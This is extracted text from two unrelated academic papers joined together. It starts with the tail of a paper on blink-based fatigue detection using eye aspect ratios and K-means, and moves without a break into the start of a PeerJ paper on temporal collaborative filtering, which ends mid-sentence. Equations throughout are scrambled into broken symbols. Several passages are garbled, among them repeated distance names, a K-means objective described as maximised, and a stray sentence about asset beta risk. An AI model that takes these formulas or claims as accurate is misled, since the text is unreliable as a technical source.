it takes a lot of time to train. parameter. RenAnhu et al[9] trained the blink classifier through the AdaBoost algorithm, but the AdaBoost algorithm is very sensitive to the discrete data of the blink. The detection of the eye part during image processing is easily affected by the speed of light and object movement, just as the blinking behavior is fast. the process of. ZengYouwen et al[10] used the correlation between computer signals and the number of blinks to determine the fatigue state, but the experiment required special equipment and equipment, and the operation was difficult and difficult to implement. Since the blinking algorithm proposed by Soukupová[11] has measured the blink threshold of the aspect ratio of the eye, using the support vector machine[12] method to analyze the collected threshold of the blink to finally obtain an EAR of 0.2, the algorithm of this paper is the In addition, by measuring the aspect ratio of the eye, the Key clustering algorithm in machine learning is used to obtain the blink threshold. As shown in Figure 2.1a, the absolute value of the longitudinal distance ab of the eye will become smaller when the eye is blinking. At this time, the ratio of cd to ab will suddenly become larger, so we analyze the threshold when the ratio International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 26 becomes larger when blinking. Figure 2a shows the distance between ab and cd, and b is the position of the human eye feature point marked by Dlib. This paper proposes the blink threshold formula as follows:  5362 412 sho pppp pp ldBlinkthre        (a)  (b) Figure 2. (a) The lateral distance is cd longitudinally ab; (b) dlib human eye calibration features C. Kmeans clustering algorithm The Kmeans algorithm is a relatively common algorithm in clustering algorithms. Its advantage is that it is easy to implement and understand, and the calculation speed is fast. The core idea is to calculate the distance between the sample point and the centroid of the cluster, and divide the calculated result into the same cluster as the sample point with the centroid of the cluster. The similarity between samples in K-means is determined by the distance between them. The closer the distance is, the higher the similarity is. The common distance calculation methods are Euclidean distance, Euclidean distance and Manhattan distance. European distance. In the cluster analysis, the formulas for two m-dimensional samples xi=(xi1,xi2,xi3...,xim) and xj=(xj1,xj2,xj3...,xjm) are as follows:     m k jkiked xxt 1 2 )(dis   The steps of the k-means algorithm are as follows: 1) First randomly select the centroids of K clusters. 2) Calculate the Euclidean distance from each sample point to each centroid, and classify it into the cluster with the smallest center of mass, and then calculate the centroid of each new cluster. 3) After all the sample points are divided, recalculate the position of the centroid of each cluster, and then iteratively calculate the distance from each sample point to the centroid of each cluster, and then re-divide the sample points. 4) Repeat steps 2 and 3 until after the iteration, the partitioning of all sample points remains unchanged, and K-means gets the optimal solution. The main problem of the calculation result is to ensure the convergence of the algorithm. Here, the square error is calculated by the following formula, which is used to illustrate that the clustering effect can minimize the sum of squares in each cluster.    2 1i )( )( ,    K ic i uxucJ    uc,j represents the sum of squares of the distance from each sample point to its cluster, )(u ic represents the centroid of the cluster to which the i-th sample belongs, and the smaller  uc,j , all the sample points and their clusters The smaller the distance, the better the quality of the division. The termination condition of the K-means algorithm is that  uc,j converges to a minimum. In order to achieve clustering, the maximum value of the objective function is obtained. Take a one-dimensional array as an example. J = ∑ ∑ (x(i) − uc(i)) 2 xj∈ui k i=1   Transform the above formula to get: 𝜕𝐽 𝜕𝑢𝑖 = 𝜕 𝜕𝑢𝑖 ∑ ∑ (𝑥𝑗 − 𝑢𝑖 ) 2 𝑥𝑗∈𝑢𝑖 𝑘 𝑖=1 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 27 = ∑ ∑ (𝑥𝑗 − 𝑢𝑖 ) 2 𝑥𝑗∈𝑢𝑖 𝑘 𝑖=1 = (−2) ∗ ∑ (𝑥𝑗 − 𝑢𝑖 ) 𝑥𝑗∈𝑢𝑖 When    ij u ij ux x 0)(*2- ）（ ui = 1 |ci| ∑ xjxj∈ui The result of the optimization is to calculate the mean of the cluster. During the experiment, the algorithm may be too slow to achieve effective results because the data set is too large. Therefore, you can specify the maximum number of convergence times for the K-means algorithm or specify the cluster center transformation threshold. When the algorithm reaches the maximum number of times or When the cluster center rate of change is less than a certain threshold, the algorithm stops updating. K-means algorithm advantages: easy to understand, easy to implement, high operating efficiency, the disadvantage is that the greedy strategy is used to cluster the sample points, resulting in easy local convergence of the algorithm, slower data processing in big data, and outliers and The noise is very sensitive, and a small number of outliers and noise points can have a significant impact on the averaging of the algorithm. III. THE EXPERIMENT This article mainly introduces two aspects, one is to introduce the source of the experimental data set, and the other is to analyze the experimental data.Figure 3 shows the author's own data collection and analysis. From left to right, the first picture is the analysis of the blink value of the author's 5 blinks, and the middle figure is when the blink threshold is 5.1 when Kmeans = 2 The blink data graph, the right graph is the actual record of the author's experiment. Figure 4 shows the data of a random experimental sample in the public data set. From left to right, the first figure analyzes the blinking value of the aspect ratio of the 3 blinks in the experimental sample. The blink data graph at 5.1, the right graph is the actual record of the experimental sample.This article uses the blink data set provided by Zhejiang University[13]. All the data in the data set is collected under the natural light of the room. There is no special illumination. The collected equipment is a common camera that comes with the computer. There are 80 video clips and 20 people participate. , four segments per person, these four segments represent a. front view without glasses; b. front view with thin edge glasses; c. front view with black frame glasses; d. View. Participants spontaneously blink at the front of the camera at normal speed. The size of each video is 320*240, the frame rate of the video is 30fps, and the duration of recording is generally about 5 seconds. The experimenter usually blinks about 1 to 6 Times, a total of 255 blinks. The following are the results of data collection and analysis. The text person has 5 blink-eye aspect ratio data Kmeans=2, the blink data chart The text person image Figure 3. The following is the experimental data of the paper International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 28 Public data set 3 times blinking eye aspect ratio data Kmeans=2, blinking data chart Public data set sample Figure 4. Public data set sample The following table a is a comparison of the public data sets provided by Zhejiang University and the experimental results of the text person. Table b is a comparison of other methods with the method of this paper. RenAnhu[9] trained the classifiers of blinking and closed eyes through the Adaboosts algorithm. The person in the video is then tested for blinking. Zhang Wei[14] performed a correlation analysis of the blink of the eye by analyzing the left forehead EEG signals Attention and Meditation and Blink data. TABLE I. COMPARED WITH PUBLIC DATASETS Experimental sample 𝐁𝐥𝐢𝐧𝐤 𝐭𝐡𝐫𝐞𝐬𝐡𝐨𝐥𝐝 Blink times Number of recognition Recognition rate Text person 5.1 100 90 90% Public data set 5.1 255 236 92.5% TABLE II. COMPARED WITH OTHER LITERATURE literature Recognition rate 9 91.5% 14 83.7% This article 92.5% IV. CONCLUSION This paper overcomes the shortcomings of digital image processing and OpenCV vision open source library, and combines the existing open source Dlib machine learning library,The data between the vertical and horizontal ratio of blink is calculated by mathematical method, and the threshold value of the vertical and horizontal ratio of blink is analyzed by means of kmeans clustering algorithm in machine learning. According to the analysis of the public data set of Zhejiang University, when the threshold value of the vertical and horizontal ratio of blink is 5.1, the accurate recognition rate of blink is 92.5%. Through the experimental comparison, this algorithm can effectively detect the fatigue state of blink, which is more important This algorithm is fast, efficient and easy to transplant to various devices, and has great practical value in the field of fatigue driving. The shortcomings of the paper: for fatigue monitoring, not only eyes as a reference point, nose tip shaking, mouth opening and so on have an impact on face fatigue, so the fatigue detection algorithm in this paper needs to be improved. REFERENCES [1] M. Hülsmann,D. Donnermeyer,E. Schäfer. A critical appraisal of studies on cyclic fatigue resistance of engine‐driven endodontic instruments[J]. International Endodontic Journal,2019,52(10). [2] Pierre Thiffault,Jacques Bergeron. Monotony of road environment and driver fatigue: a simulator study[J]. Accident Analysis and Prevention,2003,35(3). International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 29 [3] Liu Longfei, Wu Shizhen, Xu Wangming. Real-time detection method of fatigue driving based on face feature point analysis[J]. Television Technology, 2018, 42(12): 27-30+55. [4] Yan Wang,Rui Huang,Lei Guo. Eye gaze pattern analysis for fatigue detection based on GP-BCNN with ESM[J]. Pattern Recognition Letters,2019,123. [5] Driver’s Fatigue Detection Based on Yawning Extraction[J]. Nawal Alioua,Aouatif Amine,Mohammed Rziza,Aboelmagd Noureldin.International Journal of Vehicular Technology. 2014 [6] Chen Xin, Li Weixiang, Li Wei, Zhang Wenqing, Zhu Yuan. Multi-feature fusion fatigue detection method based on improved ASM [J]. Computer Engineering and Design, 2019, 40 (11): 3269-3275. [7] Rafael C.Gonzalez,Richard E.Woods.Digital Image Processing,Third Edition[M],2017 [8] Andrej Fogelton,Wanda Benesova. Eye blink completeness detection[J]. Computer Vision and Image Understanding,2018. [9] Ren Anhu, Liu Bei. Face Recognition Blink Detection Based on Adaboost[J]. Computer and Digital Engineering, 2016, 44(03): 521-524. [10] Zeng Youwen, Feng Zhen, Zhu Yabing, Li Qi.Relationship between the number of blinks and fatigue based on EEG experiment[J].Journal of Changchun University of Science and Technology(Natural Science Edition),2017,40(01):123-126. [11] Tereza Soukupova ,́Jan Cˇ ech, Eye blink detection using facial landmarks[J]. 21st Computer Vision Winter Workshop(CVWW),2016 [12] J. Manikandan,B. Venkataramani. Study and evaluation of a multi-class SVM classifier using diminishing learning technique[J]. Neurocomputing,2009,73(10). [13] F.Song, X.Tan, X.Liu and S.Chen, Eyes Closeness Detection from Still Images with Multi-scale Histograms of Principal Oriented Gradients, Pattern Recognition, 2014. [14] Zhang Wei, He Jian, Zhang Yan, Zhou Ming. A wearable fatigue driving detection system based on EEG and blink frequency[J]. Computer Engineering, 2017, 43(02): 293-298+303. https://kns.cnki.net/kcms/detail/detail.aspx?filename=SJHD14081900000343&dbcode=SJHD work_h3zthufefjdy5fufaftvouocdu ---- Submitted 17 August 2020 Accepted 16 November 2020 Published 21 December 2020 Corresponding author Nurfadhlina Mohd Sharef, nurfadhlina@upm.edu.my Academic editor Faizal Khan Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.331 Copyright 2020 Al-Hadi et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Latent based temporal optimization approach for improving the performance of collaborative filtering Ismail Ahmed Al-Qasem Al-Hadi1, Nurfadhlina Mohd Sharef2, Md Nasir Sulaiman2, Norwati Mustapha2 and Mehrbakhsh Nilashi3 1 Faculty of Ocean Engineering Technology and Informatics, Universiti Malaysia Terengganu, Kuala Nerus, Terengganu, Malaysia 2 Faculty of Computer Science and Information Technology, Universiti Putra Malaysia, Serdang, Selangor, Malaysia 3 Faculty of Computing, Universiti Teknologi Malaysia, Skudai, Johor, Malaysia ABSTRACT Recommendation systems suggest peculiar products to customers based on their past ratings, preferences, and interests. These systems typically utilize collaborative filtering (CF) to analyze customers’ ratings for products within the rating matrix. CF suffers from the sparsity problem because a large number of rating grades are not accurately determined. Various prediction approaches have been used to solve this problem by learning its latent and temporal factors. A few other challenges such as latent feedback learning, customers’ drifting interests, overfitting, and the popularity decay of products over time have also been addressed. Existing works have typically deployed either short or long temporal representation for addressing the recommendation system issues. Although each effort improves on the accuracy of its respective benchmark, an integrative solution that could address all the problems without trading off its accuracy is needed. Thus, this paper presents a Latent-based Temporal Optimization (LTO) approach to improve the prediction accuracy of CF by learning the past attitudes of users and their interests over time. Experimental results show that the LTO approach efficiently improves the prediction accuracy of CF compared to the benchmark schemes. Subjects Artificial Intelligence, Data Mining and Machine Learning, Data Science Keywords Temporal factorization, Recommender Systems, Collaborative Filtering, Drift, Decay, Matrix Factorization INTRODUCTION Recommendation systems are some of the most powerful methods for suggesting products to customers based on their interests and online purchases (Jonnalagedda et al., 2016; Lin, Li & Lian, 2020; Nilashi, bin Ibrahim & Ithnin, 2014; Nilashi et al., 2015; Zhang et al., 2020b). In terms of personalization of recommendations, one of the most prevalently used methods is collaborative filtering (CF) (Nilashi, bin Ibrahim & Ithnin, 2014; Sardianos, Ballas Papadatos & Varlamis, 2019; Nilashi et al., 2015; Wu et al., 2019). In CF, personalized prediction of products depends on the latent features of users in a rating matrix. However, the CF prediction accuracy decreases if the rating matrix is sparse (Zhang et al., 2020a; Li & Chi, 2018; Idrissi & Zellou, 2020). Several types of factorization techniques such as baseline, How to cite this article Al-Hadi IAA-Q, Sharef NM, Sulaiman MN, Mustapha N, Nilashi M. 2020. Latent based temporal optimization approach for improving the performance of collaborative filtering. PeerJ Comput. Sci. 6:e331 http://doi.org/10.7717/peerj-cs.331 https://peerj.com/computer-science mailto:nurfadhlina@upm.edu.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.331 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.331 singular value decomposition (SVD), matrix factorization (MF), and neighbors-based baseline have been exploited to address the problem of data sparsity (Mirbakhsh & Ling, 2013; Al-Hadi et al., 2017b) by predicting the missing rating scores in the rating matrix. Similarly, various factorization-based techniques including the use of latent (Vo, Hong & Jung, 2020; Nguyen & Do, 2018) and baseline factors (Koenigstein, Dror & Koren, 2011) (such as SVD (Wang et al., 2019)) have been proposed to improve the recommendation accuracy. Nevertheless, an unaddressed problem is that a part of the rating scores is misplaced from its original cells while streaming into the memory. This misplacement decreases the meticulousness of the latent feedback. A method based on ensemble divide and conquer (Al-Hadi et al., 2016) was adopted to solve the misplacement problem besides addressing the customers’ preferences drift and popularity decay. Integration of temporal preferences with factorization methods to solve the sparsity issue has yielded a better performance compared to basic factorization approaches (Al-Hadi et al., 2017b; Li, Xu & Cao, 2016; Nilashi et al., 2019; Nilashi, bin Ibrahim & Ithnin, 2014). The temporal dynamics approach (Koren, 2009) separates the time period of preferences into static digit of bins and extracts a universal weight according to the stochastic gradient descent method to reduce overfitting. Nonetheless, the learned universal weight using the temporal dynamics approach has limitations with respect to how it personalizes and represents the fluctuating temporal preferences. The temporal interaction approach (Ye & Eskenazi, 2014) enhanced the effectiveness of CF recommender systems by combining the latent factors, short-term preferences, and long-term preferences. The shrunk neighbor approach is applied to obtain clients’ short-term feedbacks (Koren, 2008). This approach detects overfitting when there is a fluctuating scale in the rating scores. For example, in the rating matrix from the MovieLens dataset, the actual score is smaller than the predicted values. In this theory, the risk of each asset is measured with its beta value (which is the criterion of systematic risk). The fluctuating scale is in the range of 0–5, whereas the anticipated rating scores are [5.75; 6.11; 5.9; 7]. Compared to other temporal approaches (e.g., the short-term based latent technique (Yang et al., 2012)), the temporal interaction approach (Ye & Eskenazi, 2014) efficiently anticipates performance of CF. Nevertheless, problems such as drifting customers’ preferences and popularity decay (e.g., deterioration of marketability of goods) still pose a significant challenge (Ye & Eskenazi, 2014). The long temporal-based factorization approach addresses the popularity decay issue (Al- Hadi et al., 2018b) while the short temporal-based factorization approach (Al-Hadi et al., 2017a) addresses the drift issue not solved by previous short-term based approaches. These temporal approaches improve the performance of CF but they are characterized by low accuracy. In view of the aforementioned, this paper presents a latent-based temporal optimization (LTO) approach to solve the significant limitations of these temporal approaches. As optimization algorithms have proven successful in various areas such as healthcare (Zainal et al., 2020)and document processing Al-Badarneh Amer (2016), we extend our earlier work (Al-Hadi et al., 2018a) and provide a detailed analysis of the proposed approach. The contributions of this paper are summarised below. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 2/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 • A comprehensive review of CF-based recommender system techniques. • A proposed LTO approach that minimizes overfitting and learns by integrating long and short-term features with the baseline and factorization features. • An LTO approach that learns the drift in the users’ interests through an improved rating score prediction. This is achieved by integrating the long and short-term features of users and items with their baseline and factorization features. • An LTO approach that solves the sparsity issue by combining the learning output of the overfitting, drift, and decay. • A comparison of LTO’s performances with other factorization and temporal-based factorization approaches. In summary, the proposed approach has superior performance as it improves the prediction accuracy in the CF technique by learning accurate latent effects of the temporal preferences of users. The novel features of the LTO approach are as follows: • It provides a personalized temporal weighting which is incorporated in matrix factorization to reduce data sparsity error. • It combines time convergence and personalized duration to accommodate consumer’s preferences drifting in the personalized recommendation system. • It utilizes the bacterial foraging optimization algorithm (BFOA) to accurately learn the personalized temporal weights by regularizing the overfitted predicted scores in the rating matrix and to track the factors of drift and decay. The rest of this paper is sectioned as follows: ‘Related works’ reviews the past works related to factorization approaches and temporal preferences. In ‘Latent-based temporal optimization approch’, LTO is elaborated, followed by experimental analysis in ‘Experimental Settings’. ‘Experimental results’ discusses the experimental results. The final section (‘Conclusion’) provides a summary and indicates possible future works. RELATED WORKS Collaborative Filtering CF is a technique developed to make automated predictions (filtering) about the interests of a customer by gathering preferences or rating scores from several other customers (collaborating). The primary idea of the CF approach is that if a user (say X) shares an attitude with another user (Y) on a subject, X is more likely to share Y’s attitude on a different issue when compared to other randomly chosen users. CF is one of the most implemented techniques used in the design of recommendation systems due to its low computational requirement (Jonnalagedda et al., 2016; Sardianos, Ballas Papadatos & Varlamis, 2019; Alhijawi & Kilani, 2020). It utilizes to find similar users or items and calculate predicted rating scores according to ratings of similar users. In addition, CF provides customized recommendations using the similarity values of customers and common preferences while the score of the active customer is placed in the rating score matrix. Changes are being made in the personalized Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 3/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 recommendation to suggest products to customers based on their tastes. This constitutes a well-established methodology with a wide range of application. In the CF technique, a forecast is achieved in three steps. The main step is estimating the values of similarity amongst common clients and the target customer with the use of similarity functions, such as the Cosine function (Nilashi et al., 2019; Alhijawi & Kilani, 2020). The rating scores supplied by the target client and the similarity values are applied in the next procedure to estimate the expected score of the product using the prediction function. The final step estimates the precision of the forecast by applying the root mean squared error (RMSE) function (Nilashi et al., 2019). CF suffers from the data sparsity problem which occurs due to a soaring proportion of undetermined scores in the users’ voting matrix. This problem is solved using several prediction methods such as neighbors-based baseline (Bell & Koren, 2007) and matrix factorization (Koren, 2009; Nguyen & Do, 2018). However, these factorization-based methods do not address temporal issues such as the drift in users’ preferences and the popularity decay of products. This results in low prediction accuracy. One of the most effective approaches for solving the data sparsity issue is MF (Koenigstein, Dror & Koren, 2011; Al-Hadi et al., 2017b). A few MF methods use mathematical formulae to combine hidden feedbacks of customers and products. The hidden feedback of customers, products, and baseline properties are incorporated in the formulae. Equation (1) forecasts the lost scores in the ranking matrix. <̂ui=µ+Bu+Bi+puq T i , (1) where <̂ui is the predicted value for the sparse score, µ is the global rate of all rating scores, pu is the latent-feedback matrix of customers, qTi is the transpose latent-feedback matrix of products, and Bu and Bi are the observed deviations of customer u and product i, respectively. To anticipate the sparse scores rating, µ, Bu, Bi, pu, and qTi are integrated in numerous mathematical equations such as those in temporal approaches (Koren, 2009; Ye & Eskenazi, 2014) and factorization methods (Al-Hadi et al., 2016; Han et al., 2018; Yuan, Zahir & Yang, 2019). For instance, the baseline factor and the distance between rating scores and baseline values of neighbors who supply their rating scores for each product are combined by the neighbors based baseline method (Bell & Koren, 2007) as presented in Eq. (2). <̂ui=Bu+ ∑ x∈Ni simxrxiBxi∑ x∈Ni simx , (2) where simx is the similarity rate of customer x with the target customer, N is the set of customers who rate product i, rxi is the rating score provided by user x for item i, and Bxi is the baseline value. Currently, the temporal recommendation methods are used to suggest products to customers at an appropriate time. These are applied in many prediction techniques to make an accurate forecast. Note that time is considered an important factor in making final decisions. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 4/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Temporal-based approaches Time is a very important factor in learning customers’ interests and tracking products’ popularity decay. The temporal preferences with matrix factorization have been used to develop efficient collaborative-based schemes in addressing the issues of sparsity, drift, and decay. For example, the temporal dynamics approach (Koren, 2009) utilizes the factorization factors, bins (static temporal periods), and global weight to learn the temporal preferences and minimize the overfitted predicted scores. However, it neglects the fact that users’ preferences change over time. Hence, the overall weights are not accurate as a result of personalization. The long-term preferences Long-term preferences differ from short-term preferences with regards to how they are applied. In a session (i.e., a week, month, or season), the recorded preferences are considered short-term preferences. On the other hand, the baseline factors and the long- term preferences are exploited in the long-term approach (Ye & Eskenazi, 2014). This is expressed in Eq. (3), where τs, τe and τui are the first, last and current time that a product i is rated by a customer u, respectively. This approach addresses the drift in customers’ preferences over the long-term but it does not address the popularity decay of products. <̂ui=µ+Bu τe−τui τe−τs +Bi τui−τs τe−τs +puq T i . (3) <̂ui= ( µ+Buωu+Biωi+puq T i )2 +Gix [ (Buωu) 2 + ∥∥pu∥∥2+(Biωi)2+∥∥qTi ∥∥2], (4) where Gix is the weight of cluster x for item i that is updated by BFOA, pu and ∥∥pu∥∥ are the latent factor and norm of latent factor of customer u, while qTi and ∥∥qTi ∥∥ are the latent factor and the norm of latent factor of product i, respectively. Moreover, the personal long-term factors are defined by ωu and ωi in Eqs. (5) and (6), respectively. ωu=exp ( − τue −τ u s τue ) , (5) ωi=exp ( − τ ie−τ i s τ ie ) , (6) where τue and τ u s are the last and the first time customer u provided a rating scores, and τ is and τ i e are the first and the last time the group of customers offers scores for product i, respectively. Nevertheless, the long temporal approaches (Al-Hadi et al., 2018b; Ye & Eskenazi, 2014) have not addressed issues such as the drift and the popularity decay by considering the short-term preferences. This lowers the prediction performance of the CF technique. The long temporal-based factorization approach (Al-Hadi et al., 2018b) learns the long-term preferences by integrating genres with factorization features to address sparsity and decay issues. However, this approach falls short of incorporating the drift in customers’ preferences which lowers the prediction accuracy of the CF. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 5/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 The short-term preferences The temporal dynamics approach (Koren, 2009) is used for predicting missing ratings by integrating the temporal weights with the different factorization factors. This approach minimizes the overfitted predicted scores during the optimization process using a global weight. However, it does not properly characterize personalized feedback. The short-term based latent method (Yang et al., 2012) learns the short-term preferences from the hidden feedback of neighbors’ preferences during a session. However, this approach is not a lasting solution, especially due to long-term, drift, and popularity decay. Similarly, the temporal integration approach (Ye & Eskenazi, 2014) integrates the long and short preferences with the baseline features to solve the drift issue. This approach is also limited by personalization, understanding the drift in users’ preferences, and items’ popularity decay over time. The short-term based baseline (Ye & Eskenazi, 2014) incorporates the baseline values of neighbors during a session with other factorization factors as shown in Eq. (7). <̂ui(t)=Bui+ ∑ j∈ν(u,t)[(ruj−Buj)$ij] √ |ν(u,t)| +puq T i , (7) where $ij is the applied weight that decreases the overfitting predicted values, ν(u,t) is the set of products ranked by customer u during time interval t (e.g., the month of July), and∑ j∈ν(u,t)[(ruj−Buj)$ij] shows the whole difference between the rating scores by customer u for a set of products during time t and the baseline values. Given the soaring ratio in the sparse values in the ranking matrix, the short-term methods are not efficient in learning short-term preferences. Products and costumers’ preferences are learned through the short temporal-based factorization method (Al-Hadi et al., 2017a) to address the drift issue and improve the prediction accuracy of CF. However, product popularity decay is ignored in this approach. Short-term preferences are represented using the temporal convergence among the customers. These are exploited for the minimization of overfitting for the predicted rating scores as shown in Eq. (8), where >xu is the temporal weight that is optimized according to the location of cluster number x that represents the short-term period. However, the prediction function of CF decreases due to the inability of the short-term methods to cover the drift and decay problems during the period. As such, the long and short-term preferences must be integrated to address all the issues in the recommendation system. <̂ui= ( µ+> x uBu+Bi+puq T i )2 +> x u [ B2u+ ∥∥pu∥∥2+B2i +∥∥qTi ∥∥2]. (8) Summarily, the existing temporal-based approaches have addressed several limitations of recommender systems such as sparsity (Zhang et al., 2020a; Idrissi & Zellou, 2020; Chu et al., 2020), drift issue (Rabiu et al., 2020; Al-Hadi et al., 2017a) and time decay issue (Koren, 2009; Ye & Eskenazi, 2014; Al-Hadi et al., 2018b). Each reviewed approach in this article has one or two research gaps, e.g., learning the personalized features, the drift preferences, and the popularity decay. There is currently no approach that considers all these issues (Table 1). Therefore, this work introduces the LTO approach for learning the features related to all these issues. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 6/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Table 1 Comparison of temporal-based approaches according to the solved issues. Temporal-based Approach Sh or t- T er m Lo n g- T er m Sp ar si ty D ri ft D ec ay Neighbors-based Baseline (Bell & Koren, 2007) X Temporal Dynamics (Koren, 2009) X X X X Ensemble Divide and Conquer (Al-Hadi et al., 2016) X Short-Term based Latent (Yang et al., 2012) X Temporal Integration (Ye & Eskenazi, 2014) X X X Long Temporal-based Factorization (Al-Hadi et al., 2018b) X X X Short Temporal-based Factorization (Al-Hadi et al., 2017a) X X X LATENT-BASED TEMPORAL OPTIMIZATION APPROACH The LTO approach addresses both long and short temporal preferences by using factorization to solve issues of preference drift and popularity decay (alg1). LTO applies RMSE, Cosine, and Prediction functions to assess the temporal preference representation. The key empirical setting of the temporal-based factorization method and the proposed solution framework are presented in Fig. 1. BFOA is exploited to capture the preferences of a short duration. By applying k-means, the timestamp convergence deals with short durations in the time matrix. The number of clusters k is recognized based on the number of short durations in the entire period. Generally, bacteria cannot track the drift and the time decay perfectly during the short-term without considering the long-term. Therefore, the integration of the long and short durations represents the accurate solution for solving the limitations of the drift and the time decay. In Fig. 2, we present an example of how to create the bacteria members by applying the k-means method. In this example, the clusters’ number is assigned 2 for each of the users’ and items’ features. Based on the time convergence between the products (columns) and customers (rows), four bacteria members are shown in Fig. 2. The standard BFOA is utilized in the LTO process to detect the temporal conducts of customers and products. BFOA members initialize the short-term weights using random values. The LTO approach changes these weights throughout the lifecycle of BFOA dynamically based on the positive effect it has on learning stages. The weights of bacteria members >ux and > i y are updated dynamically throughout the learning iteration. This provides a novel tracking of users’ interests in the items. The LTO uses Eq. (9) to reduce the overfitted predicted scores throughout the learning iteration. Dui= ( µ+> u xBuωu+> i yBiωi+puq T i )2 , (9) where>ux and> i y indicate the short temporal weights indexed by clusters x and y. User u is indexed by cluster x and item i is indexed by cluster y. The values of>ux and> i y are updated in each iteration according to the positive effect in developing the accuracy prediction of the Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 7/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Algorithm 1 Latent-based Temporal Optimization Data preparation based on personalization RatingMatrix,TimeMatrix ←Assign the active user ←Data set Learning latent and baseline vectors Matrixvec ←µ,Bu,Bi,pu,qTi ←BaseLine,SVD←RatingMatrix Matrixvec ← ∥∥pu∥∥2,∥∥qTi ∥∥2←∥∥pu∥∥=√∑mu=1(pu)2,∥∥qTi ∥∥2,∥∥qTi ∥∥=√∑ni=1(qTi )2 Matrixvec ←ωu←ωu=exp ( − τue −τ u s τue ) ←τus ,τ u e ←TimeMatrix Matrixvec ←ωi←ωi=exp ( − τ ie−τ i s τ ie ) ←τ is,τ i e ←TimeMatrix Assign the number of short durations #D←Number of days←Total duration of dataset #OneWeek←#D/7,#TwoWeeks←#D/14,#OneMonth←#D/30 #OneSeason←#D/90,#OneYear ←#D/365 Learning short-term features of users by #OneMonth Assign the number of clusters based on the number of short duration of users x ←#OneMonth Temporal index of users←k−means(TimeMatrix,x) [> x 1,> x 2,...,> x u]←Temporal index of users Learning short-term features of items by #OneMonth Assign the number of clusters based on the number of short duration of items y ←#OneMonth Temporal index of items←k−means(TimeMatrix,y) [> y 1,> y 2,...,> y i ]←Temporal index of items Create Bacteria Combining the temporal features of users and the temporal features of items in one matrix [> x 1,> x 2,...,> x u,> y 1,> y 2,...,> y i ]←[> x 1,> x 2,...,> x u]and[> y 1,> y 2,...,> y i ] Assign the variables of the training process Assign RMSEoptimum and Iteration number Initialize random values for S Bacteria Repeat Predicting the sparse scores in RatingMatrix UpdatedBacteria ←Training the weights of short-term [>x1,...,> x u,> y 1,...,> y i ] using BFOA Dui,Fu,Gi←Equations 9, 10, 11←Updated Bacteria, Matrixvec, Rating Matrix Rating Matrix with predictions←<̂ui=Dui+Fu+Gi CF technique←Rating Matrix with predictions similarity values←Cosine Function←CF technique predicted values for items←prediction function← similarity values RMSE value←RMSE function←predicted values for items and scores of ac- tive user Until RMSE <=RMSEoptimum or complete the iteration loop Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 8/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Figure 1 Latent-based Temporal Optimization Framework. Full-size DOI: 10.7717/peerjcs.331/fig-1 Figure 2 An example of bacteria members initialization. Full-size DOI: 10.7717/peerjcs.331/fig-2 CF method. The vectors ωu and ωi are the long-temporal independent weights of customer u and product i while Bu, Bi, pu, qTi represent the baseline and factorization variables. The second contribution of LTO is tracking users’ drifting interests. This is learned by focusing on the time associated with users’ interests as represented by Eq. (10). Fu=> u x [ (Buωu) 2 + ∥∥pu∥∥2], (10) Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 9/25 https://peerj.com https://doi.org/10.7717/peerjcs.331/fig-1 https://doi.org/10.7717/peerjcs.331/fig-2 http://dx.doi.org/10.7717/peerj-cs.331 where ∥∥pu∥∥2 represents the norm value of user’s latent factor and>ux is updated according to the positive effects of changing users’ interests throughout the learning process. The third contribution of LTO is tracking the popularity decay of items throughout the learning process by focusing on the time popularity of items as shown in Eq. (11). Gi=> i y [ (Biωi) 2 + ∥∥qTi ∥∥2], (11) where ∥∥qTi ∥∥2 is the norm factorization variable of items and >iy is updated according to the improvement achieved through the learning iteration which affects the baseline values and norm factorization features of items. Furthermore, BFOA learns the significance of each short-term period by applying the RMSE (which acts as the fitness value). These contributions are combined in Eq. (12) to predict the unknown values within the rating matrix. <̂ui=Dui+Fu+Gi. (12) The BFOA operates in three stages: chemotaxis, reproduction, and removal and distribution. The first stage involves seeking the closest nutrition source by the bacteria. This is accomplished by swimming or tumbling or alternating between swimming and tumbling to change direction during the generation. In this process, the flagella of the bacteria make clockwise rotations to choose another path so that rich nutrients in the surrounding can be obtained. The tumbling stage is expressed in Eq. (13). τ i(j+1,k,l)=τ i(j,k,l)+Ci+ θ√ θti θi , (13) where τ is the short-term features of one bacterium, the variables i, j, k and l symbolize i-th bacterium at j-th chemotactic, k-th reproduction and l-th elimination and dispersal steps. Ci is the walk length in an irregular direction, 2i is a random value oncterium number i at j-th chemotactic, k-th reproduction and [-1,1], and 2√ 2ti 2i is the unit walk in the irregular direction. Swimming follows tumbling whenever the flagella of bacteria make the counterclockwise rotation to move in a particular direction. The bacteria continue swimming in the same direction if the nutrients are rich and the alternation between tumbling and swimming is repeated until the chemotactic stage is complete. The swarming function utilizes a sensor to provide signals in a nutrient-rich environment. When the signal indicates a poor nutrient or a dangerous location, the bacteria shift from the center to the outward direction with a moving ring of the members. If the 